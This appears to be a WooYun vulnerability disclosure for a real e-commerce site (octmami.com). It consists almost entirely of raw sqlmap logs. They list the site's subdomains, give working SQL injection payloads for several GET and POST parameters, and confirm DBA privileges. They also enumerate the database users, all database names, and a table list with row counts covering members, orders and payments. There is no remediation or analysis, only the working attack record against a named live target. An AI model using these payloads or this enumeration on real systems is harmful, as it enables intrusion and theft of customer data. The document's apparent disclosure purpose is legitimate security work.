WooYun.org

http://27.115.100.242/wap/detail/index?goods=2926
http://st.octmami.com/wap/detail/index?goods=2926
http://manage.st.octmami.com/wap/detail/index?goods=2926
http://svn.octmami.com/wap/detail/index?goods=2926
http://test2.st.octmami.com/wap/detail/index?goods=2926
http://test.st.octmami.com/wap/detail/index?goods=2926
http://t.st.octmami.com/wap/detail/index?goods=2926
http://dev.st.octmami.com/wap/detail/index?goods=2926
http://1.st.octmami.com/wap/detail/index?goods=2926
http://3.st.octmami.com/wap/detail/index?goods=2926
http://s2.st.octmami.com/wap/detail/index?goods=2926

[*] starting at 03:42:47
[03:42:47] [INFO] testing connection to the target URL
[03:42:48] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:42:48] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[03:42:49] [INFO] target URL is stable
[03:42:49] [INFO] testing if GET parameter 'goods' is dynamic
[03:42:49] [INFO] heuristics detected web page charset 'utf-8'
[03:42:49] [INFO] confirming that GET parameter 'goods' is dynamic
[03:42:49] [INFO] GET parameter 'goods' is dynamic
[03:42:50] [INFO] heuristic (basic) test shows that GET parameter 'goods' might
be injectable (possible DBMS: 'MySQL')
[03:42:50] [INFO] testing for SQL injection on GET parameter 'goods'
[03:42:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:42:50] [WARNING] reflective value(s) found and filtering out
[03:42:51] [INFO] GET parameter 'goods' seems to be 'AND boolean-based blind - W
HERE or HAVING clause' injectable
[03:42:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[03:42:52] [INFO] GET parameter 'goods' is 'MySQL >= 5.0 AND error-based - WHERE
 or HAVING clause' injectable
[03:42:52] [INFO] testing 'MySQL inline queries'
[03:42:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:42:52] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[03:43:14] [INFO] GET parameter 'goods' seems to be 'MySQL > 5.0.11 stacked quer
ies' injectable
[03:43:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:44:14] [INFO] GET parameter 'goods' seems to be 'MySQL > 5.0.11 AND time-bas
ed blind' injectable
[03:44:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:44:14] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:44:14] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[03:44:16] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[03:44:59] [INFO] testing 'Generic UNION query (27) - 1 to 20 columns'
GET parameter 'goods' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: goods
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: goods=2926 AND 5665=5665
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: goods=2926 AND (SELECT 4829 FROM(SELECT COUNT(*),CONCAT(0x717764627
1,(SELECT (CASE WHEN (4829=4829) THEN 1 ELSE 0 END)),0x7179756a71,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: goods=2926; SELECT SLEEP(5)--
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: goods=2926 AND SLEEP(5)
---
[03:49:40] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[03:49:40] [INFO] fetching current user
[03:49:40] [INFO] retrieved: chen@%
current user:    'chen@%'
[03:49:40] [INFO] fetching current database
[03:49:40] [INFO] retrieved: ecstore
current database:    'ecstore'
[03:49:40] [INFO] testing if current user is DBA
[03:49:40] [INFO] fetching current user
current user is DBA:    True
database management system users [9]:
[*] ''@'localhost'
[*] 'chen'@'%'
[*] 'ecstore'@'localhost'
[*] 'proftpd'@'%'
[*] 'proftpd'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[03:51:03] [INFO] fetching database names
[03:51:03] [INFO] the SQL query used returns 12 entries
[03:51:03] [INFO] starting 10 threads
[03:51:04] [INFO] retrieved: mysql
[03:51:04] [INFO] retrieved: performance_schema
[03:51:04] [INFO] retrieved: information_schema
[03:51:04] [INFO] retrieved: test
[03:51:04] [INFO] retrieved: ecstore_new
[03:51:04] [INFO] retrieved: purchase
[03:51:04] [INFO] retrieved: server
[03:51:04] [INFO] retrieved: octmami
[03:51:04] [INFO] retrieved: ecstore
[03:51:04] [INFO] retrieved: corp
[03:51:04] [INFO] retrieved: youxi
[03:51:04] [INFO] retrieved: zentao
available databases [12]:
[*] corp
[*] ecstore
[*] ecstore_new
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] purchase
[*] server
[*] test
[*] youxi
[*] zentao
Database: ecstore_new
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| oct_product_price_snapshot      | 224072  |
| oct_coupon_list                 | 81028   |
| sdb_image_image                 | 71715   |
| sdb_b2c_comment_goods_point     | 27465   |
| oct_cps_log                     | 19161   |
| sdb_b2c_order_log               | 15183   |
| sdb_b2c_members                 | 14474   |
| sdb_image_image_attach          | 13150   |
| sdb_b2c_member_comments         | 12571   |
| sdb_b2c_order_items             | 10272   |
| sdb_b2c_order_objects           | 10244   |
| sdb_b2c_products                | 7366    |
| oct_verification_code           | 6576    |
| oct_member_point                | 6538    |
| sdb_operatorlog_normallogs      | 5897    |
| oct_member_wap_info             | 5688    |
| oct_advertisement_items         | 5528    |
| sdb_b2c_goods_keywords          | 5377    |
| oct_b2c_goods_spec_index        | 5284    |
| sdb_b2c_goods                   | 5139    |
| sdb_b2c_member_coupon           | 4697    |
| oct_member_weixin_bind          | 4680    |
| sdb_b2c_order_pmt               | 4605    |
| sdb_b2c_orders                  | 4581    |
| sdb_b2c_delivery_items          | 3793    |
| sdb_ectools_regions             | 3266    |
| sdb_b2c_member_addrs            | 3199    |
| sdb_b2c_order_delivery          | 2497    |
| sdb_b2c_delivery                | 2492    |
| oct_recommend_loaction          | 2305    |
| oct_member_weixin_bind3         | 2173    |
| sdb_pam_members                 | 1920    |
| sdb_b2c_goods_spec_index        | 1672    |
| sdb_b2c_goods_type_props_value  | 1606    |
| sdb_base_kvstore                | 1579    |
| sdb_pam_log_desktop             | 1515    |
| sdb_b2c_cart_objects            | 1320    |
| sdb_b2c_type_brand              | 1231    |
| sdb_apiactionlog_apilog         | 1222    |
| oct_prompt_limit                | 947     |
| sdb_b2c_member_point            | 839     |
| sdb_base_app_content            | 784     |
| oct_search_words                | 673     |
| sdb_b2c_member_goods            | 607     |
| sdb_desktop_tag_rel             | 607     |
| sdb_base_cache_expires          | 606     |
| oct_banner_info                 | 577     |
| oct_banner_location             | 577     |
| sdb_b2c_sell_logs               | 569     |
| sdb_ectools_analysis_logs       | 559     |
| sdb_dbeav_meta_value_text       | 517     |
| sdb_b2c_spec_values             | 454     |
| sdb_dbeav_meta_value_longtext   | 452     |
| sdb_ectools_order_bills         | 421     |
| sdb_desktop_recycle             | 418     |
| sdb_ectools_payments            | 380     |
| sdb_b2c_brand                   | 335     |
| oct_prize                       | 322     |
| sdb_aftersales_return_product   | 317     |
| sdb_base_setting                | 317     |
| oct_advertisement               | 300     |
| sdb_b2c_goods_type_props        | 295     |
| oct_order_pmt                   | 275     |
| sdb_desktop_menus               | 258     |
| sdb_b2c_order_cancel_reason     | 235     |
| sdb_site_widgets_instance       | 203     |
| oct_cps_valuation               | 200     |
| oct_turn_table                  | 200     |
| oct_coupon_order_item           | 186     |
| oct_brand_special               | 153     |
| oct_stores                      | 140     |
| oct_cps_put                     | 121     |
| sdb_site_widgets                | 121     |
| sdb_system_queue_mysql          | 110     |
| oct_feedback                    | 102     |
| oct_stores_image                | 99      |
| oct_special_product             | 98      |
| sdb_b2c_goods_cat               | 93      |
| sdb_b2c_goods_rate              | 93      |
| sdb_site_themes_file            | 93      |
| sdb_order_task_log              | 82      |
| sdb_operatorlog_register        | 79      |
| sdb_b2c_goods_type              | 76      |
| sdb_b2c_goods_type_spec         | 73      |
| sdb_content_article_bodys       | 72      |
| sdb_b2c_goods_lv_price          | 68      |
| sdb_search_associate            | 63      |
| oct_service_call                | 58      |
| sdb_search_delta                | 58      |
| sdb_site_themes_tmpl            | 57      |
| oct_cps_put_type                | 54      |
| baby_face_get_stars             | 52      |
| oct_cps_case                    | 50      |
| sdb_base_apps                   | 49      |
| oct_coupon_cate                 | 45      |
| oct_coupon_rule                 | 45      |
| oct_prompt_flash                | 43      |
| sdb_ectools_refunds             | 41      |
| oct_banner_dimension            | 40      |
| sdb_content_article_indexs      | 40      |
| oct_coupon_grant                | 37      |
| oct_recommend_comment_cat       | 36      |
| sdb_starbuy_special_goods       | 35      |
| sdb_b2c_goods_promotion_ref     | 34      |
| sdb_b2c_sales_rule_order        | 31      |
| sdb_desktop_tag                 | 31      |
| sdb_dbeav_meta_value_varchar    | 30      |
| sdb_b2c_dlycorp                 | 27      |
| sdb_b2c_member_systmpl          | 26      |
| sdb_b2c_goods_virtual_cat       | 25      |
| sdb_site_modules                | 25      |
| sdb_couponlog_order_coupon_ref  | 24      |
| sdb_couponlog_order_coupon_user | 24      |
| sdb_gift_ref                    | 24      |
| sdb_desktop_hasrole             | 22      |
| sdb_b2c_coupons                 | 20      |
| sdb_b2c_specification           | 20      |
| sdb_dbeav_meta_register         | 18      |
| oct_recommend_dimension         | 17      |
| sdb_desktop_users               | 17      |
| sdb_wap_modules                 | 16      |
| sdb_dbeav_meta_value_int        | 14      |
| sdb_pam_account                 | 14      |
| sdb_starbuy_special             | 14      |
| oct_recommend_comment_define    | 12      |
| oct_sm_task_items               | 12      |
| sdb_base_crontab                | 12      |
| sdb_wap_widgets                 | 12      |
| oct_recommend_comment_info      | 10      |
| sdb_b2c_member_advance          | 9       |
| sdb_content_article_nodes       | 9       |
| sdb_site_menus                  | 9       |
| oct_search_hot                  | 8       |
| sdb_b2c_member_lv               | 8       |
| oct_special_info                | 7       |
| sdb_importexport_task           | 7       |
| sdb_site_seo                    | 7       |
| oct_sm_queues                   | 6       |
| sdb_b2c_reship_items            | 6       |
| sdb_desktop_roles               | 6       |
| oct_channel                     | 5       |
| oct_employees                   | 5       |
| oct_goods_seckill               | 5       |
| oct_prompt_activity             | 5       |
| oct_sm_users                    | 5       |
| sdb_wap_themes_file             | 5       |
| sdb_wap_themes_tmpl             | 5       |
| sdb_wap_widgets_instance        | 5       |
| oct_admin_group                 | 4       |
| oct_sm_tasks                    | 4       |
| sdb_b2c_dlytype                 | 4       |
| sdb_b2c_reship                  | 4       |
| oct_location                    | 3       |
| oct_sm_models                   | 3       |
| sdb_b2c_comment_goods_type      | 3       |
| sdb_base_network                | 3       |
| sdb_ectools_analysis            | 3       |
| sdb_site_themes                 | 3       |
| sdb_starbuy_promotions_type     | 3       |
| oct_agent                       | 2       |
| oct_business_district           | 2       |
| sdb_b2c_orders_recommend        | 2       |
| sdb_gift_cat                    | 2       |
| sdb_site_route_statics          | 2       |
| oct_draw_list                   | 1       |
| oct_goods_ads                   | 1       |
| oct_sm_tags                     | 1       |
| sdb_b2c_goods_store_prompt      | 1       |
| sdb_desktop_filter              | 1       |
| sdb_ectools_currency            | 1       |
| sdb_site_explorers              | 1       |
| sdb_site_link                   | 1       |
| sdb_starbuy_cancelorder         | 1       |
| sdb_starbuy_count_member_buy    | 1       |
| sdb_wap_themes                  | 1       |
+---------------------------------+---------+

[09:28:51] [INFO] testing connection to the target URL
[09:28:51] [INFO] heuristics detected web page charset 'ascii'
[09:28:51] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[09:28:52] [INFO] target URL is stable
[09:28:52] [INFO] testing if POST parameter 'goods_id' is dynamic
[09:28:52] [INFO] confirming that POST parameter 'goods_id' is dynamic
[09:28:52] [WARNING] POST parameter 'goods_id' does not appear dynamic
[09:28:53] [INFO] heuristic (basic) test shows that POST parameter 'goods_id' mi
ght be injectable (possible DBMS: 'MySQL')
[09:28:53] [INFO] testing for SQL injection on POST parameter 'goods_id'
[09:28:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:28:53] [WARNING] reflective value(s) found and filtering out
[09:28:53] [INFO] POST parameter 'goods_id' seems to be 'AND boolean-based blind
 - WHERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:28:53] [INFO] POST parameter 'goods_id' is 'MySQL >= 5.0 AND error-based - W
HERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'MySQL inline queries'
[09:28:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:28:54] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:29:04] [INFO] POST parameter 'goods_id' seems to be 'MySQL > 5.0.11 stacked
queries' injectable
[09:29:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:30:05] [INFO] POST parameter 'goods_id' seems to be 'MySQL > 5.0.11 AND time
-based blind' injectable
[09:30:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:30:05] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:30:05] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[09:30:06] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[09:30:09] [INFO] testing 'Generic UNION query (87) - 1 to 20 columns'
POST parameter 'goods_id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[09:30:14] [INFO] testing if POST parameter 'spec' is dynamic
[09:30:14] [INFO] confirming that POST parameter 'spec' is dynamic
[09:30:14] [INFO] POST parameter 'spec' is dynamic
[09:30:14] [WARNING] heuristic (basic) test shows that POST parameter 'spec' mig
ht not be injectable
[09:30:14] [INFO] testing for SQL injection on POST parameter 'spec'
[09:30:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:30:17] [INFO] testing 'MySQL inline queries'
[09:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:30:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:30:19] [INFO] testing 'MySQL UNION query (87) - 1 to 10 columns'
[09:30:22] [INFO] testing 'Generic UNION query (87) - 1 to 10 columns'
[09:30:25] [WARNING] POST parameter 'spec' is not injectable
sqlmap identified the following injection points with a total of 116 HTTP(s) req
uests:
---
Place: POST
Parameter: goods_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: goods_id=2858 AND 9858=9858&spec=24-306 28-346
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: goods_id=2858 AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x717979
7871,(SELECT (CASE WHEN (8940=8940) THEN 1 ELSE 0 END)),0x71616a7271,FLOOR(RAND(
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&spec=24-306 28-346
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: goods_id=2858; SELECT SLEEP(5)-- &spec=24-306 28-346
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: goods_id=2858 AND SLEEP(5)&spec=24-306 28-346
---
[09:30:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[09:30:25] [INFO] fetching current user
[09:30:26] [INFO] retrieved: chen@%
current user:    'chen@%'
[09:30:26] [INFO] fetching current database
[09:30:26] [INFO] retrieved: ecstore
current database:    'ecstore'
[09:30:26] [INFO] testing if current user is DBA
[09:30:26] [INFO] fetching current user
current user is DBA:    True

[09:31:33] [INFO] testing connection to the target URL
[09:31:34] [INFO] heuristics detected web page charset 'ascii'
[09:31:34] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[09:31:35] [INFO] target URL is stable
[09:31:35] [INFO] testing if POST parameter 'product_id' is dynamic
[09:31:35] [INFO] confirming that POST parameter 'product_id' is dynamic
[09:31:35] [INFO] POST parameter 'product_id' is dynamic
[09:31:35] [INFO] heuristic (basic) test shows that POST parameter 'product_id'
might be injectable (possible DBMS: 'MySQL')
[09:31:35] [INFO] testing for SQL injection on POST parameter 'product_id'
[09:31:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:31:35] [WARNING] reflective value(s) found and filtering out
[09:31:36] [INFO] POST parameter 'product_id' seems to be 'AND boolean-based bli
nd - WHERE or HAVING clause' injectable
[09:31:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:31:36] [INFO] POST parameter 'product_id' is 'MySQL >= 5.0 AND error-based -
 WHERE or HAVING clause' injectable
[09:31:36] [INFO] testing 'MySQL inline queries'
[09:31:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:31:36] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:31:47] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 stacke
d queries' injectable
[09:31:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:31:57] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 AND ti
me-based blind' injectable
[09:31:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:31:57] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:31:58] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[09:31:58] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[09:32:01] [INFO] testing 'Generic UNION query (49) - 1 to 20 columns'
POST parameter 'product_id' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
[09:32:04] [INFO] testing if POST parameter 'buy_number' is dynamic
[09:32:04] [INFO] confirming that POST parameter 'buy_number' is dynamic
[09:32:04] [INFO] POST parameter 'buy_number' is dynamic
[09:32:05] [INFO] heuristic (basic) test shows that POST parameter 'buy_number'
might be injectable (possible DBMS: 'MySQL')
[09:32:05] [INFO] testing for SQL injection on POST parameter 'buy_number'
[09:32:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:32:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:32:08] [INFO] testing 'MySQL inline queries'
[09:32:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:32:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:32:10] [INFO] testing 'MySQL UNION query (49) - 1 to 10 columns'
[09:32:13] [INFO] testing 'Generic UNION query (49) - 1 to 10 columns'
[09:32:16] [WARNING] POST parameter 'buy_number' is not injectable
sqlmap identified the following injection points with a total of 123 HTTP(s) req
uests:
---
Place: POST
Parameter: product_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=5353 AND 5490=5490&buy_number=2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: product_id=5353 AND (SELECT 5614 FROM(SELECT COUNT(*),CONCAT(0x7166
656171,(SELECT (CASE WHEN (5614=5614) THEN 1 ELSE 0 END)),0x7164777071,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&buy_number=2
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: product_id=5353; SELECT SLEEP(5)-- &buy_number=2
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: product_id=5353 AND SLEEP(5)&buy_number=2
---
[09:32:17] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[09:32:17] [INFO] fetching current user
[09:32:17] [INFO] retrieved: chen@%
current user:    'chen@%'
[09:32:17] [INFO] fetching current database
[09:32:17] [INFO] retrieved: ecstore
current database:    'ecstore'
[09:32:17] [INFO] testing if current user is DBA
[09:32:17] [INFO] fetching current user
current user is DBA:    True

[09:40:12] [INFO] testing connection to the target URL
[09:40:12] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: product_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=5353 AND 4348=4348&quantity=2&quantity_type=add
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: product_id=5353 AND (SELECT 4743 FROM(SELECT COUNT(*),CONCAT(0x7174
747671,(SELECT (CASE WHEN (4743=4743) THEN 1 ELSE 0 END)),0x7170637671,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quantity=2&quanti
ty_type=add
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: product_id=5353; SELECT SLEEP(5)-- &quantity=2&quantity_type=add
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: product_id=5353 AND SLEEP(5)&quantity=2&quantity_type=add
---
[09:40:12] [INFO] testing MySQL
[09:40:12] [WARNING] reflective value(s) found and filtering out
[09:40:12] [INFO] confirming MySQL
[09:40:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL >= 5.0.0
[09:40:13] [INFO] fetching current user
[09:40:13] [INFO] resumed: chen@%
current user:    'chen@%'
[09:40:13] [INFO] fetching current database
[09:40:13] [INFO] resumed: ecstore
current database:    'ecstore'
[09:40:13] [INFO] testing if current user is DBA
[09:40:13] [INFO] fetching current user
current user is DBA:    True